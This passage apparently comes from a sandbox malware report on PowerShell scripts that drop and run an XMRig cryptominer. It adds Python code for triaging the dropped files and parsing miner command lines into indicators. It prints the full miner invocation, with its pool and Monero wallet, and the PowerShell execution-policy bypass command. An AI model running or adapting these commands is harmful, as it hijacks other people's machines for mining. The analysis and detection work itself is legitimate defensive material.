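    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_savfhfya.udc.ps1",
     "d17fe0a3f47be24a6453e9ef58c94641",
     "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfccs3zs.tye.ps1",
     "c4ca4238a0b923820dcc509a6f75849b",
     "356a192b7913b04c54574d18c28d46e6395428ab",
     "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"),
    (r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "205ad9eb6acd6f58752899669b69fe74",
     "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
]

# powershell.exe writes __PSScriptPolicyTest_<random>.<random>.ps1 into %TEMP% when it starts, to
# test whether AppLocker/WDAC constrains script execution. It is PowerShell's own file, not a
# payload. The classic probe body is the single byte "1"; the body differs between builds, so the
# name pattern, not the hash, is what identifies the artifact.
POLICY_PROBE_NAME = re.compile(r"(?i)[\\/]__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$")
PROBE_BODY = b"1"
PROBE_HASHES = {
    "md5": hashlib.md5(PROBE_BODY).hexdigest(),
    "sha1": hashlib.sha1(PROBE_BODY).hexdigest(),
    "sha256": hashlib.sha256(PROBE_BODY).hexdigest(),
}


def triage_file(path, md5, sha1, sha256):
    """Classify one Files entry: PowerShell's own policy probe, a dropped executable, or unknown."""
    if POLICY_PROBE_NAME.search(path):
        verified = (md5, sha1, sha256) == (PROBE_HASHES["md5"], PROBE_HASHES["sha1"], PROBE_HASHES["sha256"])
        return {"path": path, "class": "benign-powershell-artifact",
                "probe_body_verified": verified, "ioc": False}
    lower = path.lower()
    if "\\appdata\\local\\temp\\" in lower and lower.endswith(".exe"):
        # Heuristic (this example's own): a PE written under the user's Temp directory and then run,
        # which is what the report's "Executes dropped EXE" signature recorded for xmrig.exe.
        return {"path": path, "class": "dropped-executable", "ioc": True,
                "md5": md5, "sha1": sha1, "sha256": sha256}
    return {"path": path, "class": "unclassified", "ioc": False}


def hunt_set(entries):
    """SHA-256 values worth searching for across a fleet: only the real dropped executables."""
    return {r["sha256"] for r in (triage_file(*e) for e in entries) if r["ioc"]}


if __name__ == "__main__":
    for entry in REPORT_FILES:
        result = triage_file(*entry)
        print("%-28s %s" % (result["class"], result["path"]))
    print("hunt:", sorted(hunt_set(REPORT_FILES)))
```

The MD5 d17fe0a3f47be24a6453e9ef58c94641 seen on the win10v2004 and win11 detonations is classified by name only; its body is not the one-byte probe and the report does not show what it contains.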

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:35

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows in the original: the rule matched 64 times, and the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

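The xmrig command line recorded above (identical in behavioral3, behavioral4, behavioral5 and behavioral18) carries the whole mining configuration: RandomX (-a rx), a stratum pool reached over TLS on port 443 (so a port-based egress filter sees only another HTTPS session), and a -u value that bundles coin, Monero wallet and worker name. The SeLockMemoryPrivilege rows under "Suspicious use of AdjustPrivilegeToken" are xmrig asking for the right to lock pages, which it needs for large-page RandomX datasets. The following is an added example, not part of the sandbox report and not xmrig's own code: a Python parser that turns such a command line into structured IOCs and gives the reasons a detection would fire. The option table covers the flags used here plus a few common xmrig ones; the COIN:ADDRESS.WORKER split of -u is unMineable's convention and is labelled as an assumption in the code; the second call in the usage (pool.example.net, the 4abc wallet) is an invented input showing that a plain pool URL with --tls parses the same way.

```python
import re
from urllib.parse import urlsplit

# Command line recorded for the dropped miner, copied from the report.
XMRIG_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac '
    r'-p x'
)

# xmrig options that take a value (short and long spellings map to one field) and bare flags.
VALUE_OPTS = {
    "-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
    "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass",
    "-t": "threads", "--threads": "threads", "--coin": "coin",
    "--rig-id": "rig_id", "--donate-level": "donate_level",
}
BOOL_OPTS = {
    "-k": "keepalive", "--keepalive": "keepalive", "--tls": "tls",
    "-B": "background", "--background": "background", "--nicehash": "nicehash",
}

# Monero addresses are base58 without 0/O/I/l: 95 chars starting with 4 (standard) or 8
# (subaddress), or 106 chars starting with 4 (integrated address).
XMR_ADDRESS = re.compile(r"^(?:[48][1-9A-HJ-NP-Za-km-z]{94}|4[1-9A-HJ-NP-Za-km-z]{105})$")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_xmrig_cmdline(cmdline):
    """Turn an xmrig invocation into structured IOCs: pool, TLS, wallet, worker, algorithm."""
    toks = tokenize(cmdline)
    info = {"image": toks[0], "args": {}, "flags": set()}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("--") and "=" in tok:            # --url=stratum+ssl://...
            opt, val = tok.split("=", 1)
            if opt in VALUE_OPTS:
                info["args"][VALUE_OPTS[opt]] = val
            i += 1
        elif tok in VALUE_OPTS and i + 1 < len(toks):
            info["args"][VALUE_OPTS[tok]] = toks[i + 1]
            i += 2
        elif tok in BOOL_OPTS:
            info["flags"].add(BOOL_OPTS[tok])
            i += 1
        else:
            i += 1                                          # option this parser does not model
    args = info["args"]
    if "url" in args:
        u = urlsplit(args["url"])
        info["pool_host"], info["pool_port"] = u.hostname, u.port
        info["pool_tls"] = u.scheme.endswith(("+ssl", "+tls")) or "tls" in info["flags"]
    if "user" in args:
        # Assumption: unMineable's COIN:ADDRESS.WORKER user format, as seen in this sample.
        # Plain ADDRESS or ADDRESS.WORKER (most other pools) falls out of the same split.
        coin, sep, rest = args["user"].partition(":")
        if not sep:
            coin, rest = "", coin
        address, _, worker = rest.partition(".")
        info["coin"] = coin or None
        info["wallet"] = address
        info["worker"] = worker or None
        info["wallet_is_monero"] = bool(XMR_ADDRESS.match(address))
    return info


def miner_verdict(info):
    """Reasons to treat the process as a cryptominer; an empty list means no miner traits found."""
    reasons = []
    if info["args"].get("url", "").startswith("stratum"):
        reasons.append("stratum pool URL %s:%s" % (info.get("pool_host"), info.get("pool_port")))
    if info.get("pool_tls") and info.get("pool_port") == 443:
        reasons.append("stratum over TLS on 443: indistinguishable from HTTPS to a port-based egress filter")
    if str(info["args"].get("algo", "")).startswith("rx"):
        reasons.append("RandomX algorithm (Monero family)")
    if info.get("wallet_is_monero"):
        reasons.append("Monero wallet address in the user field")
    return reasons


if __name__ == "__main__":
    parsed = parse_xmrig_cmdline(XMRIG_CMDLINE)
    for key in ("image", "pool_host", "pool_port", "pool_tls", "coin", "wallet", "worker"):
        print("%-10s %s" % (key, parsed[key]))
    for reason in miner_verdict(parsed):
        print("  -", reason)
    # Invented input: a plain stratum+tcp pool with the --tls flag and an ADDRESS.WORKER user.
    other = parse_xmrig_cmdline("xmrig.exe --url=stratum+tcp://pool.example.net:3333 -u 4abc.rig7 --tls -k")
    print(other["pool_host"], other["pool_port"], other["pool_tls"], other["wallet"], other["worker"])
```

The wallet string is the stable indicator: the pool, worker name and even the binary can change between campaigns, while the payout address is what the operator cannot rotate without losing the proceeds, so it belongs in the IOC set alongside the pool host and the file hashes.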
Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kndtbgr4.q0m.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:42

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.21:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jh5pxk3e.nun.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:53

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1767s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qckj1yop.a54.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1762s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 52.111.243.31:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0ww0mai.x1s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzvcdwnt.5j0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:33

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ify2pwzo.e0m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

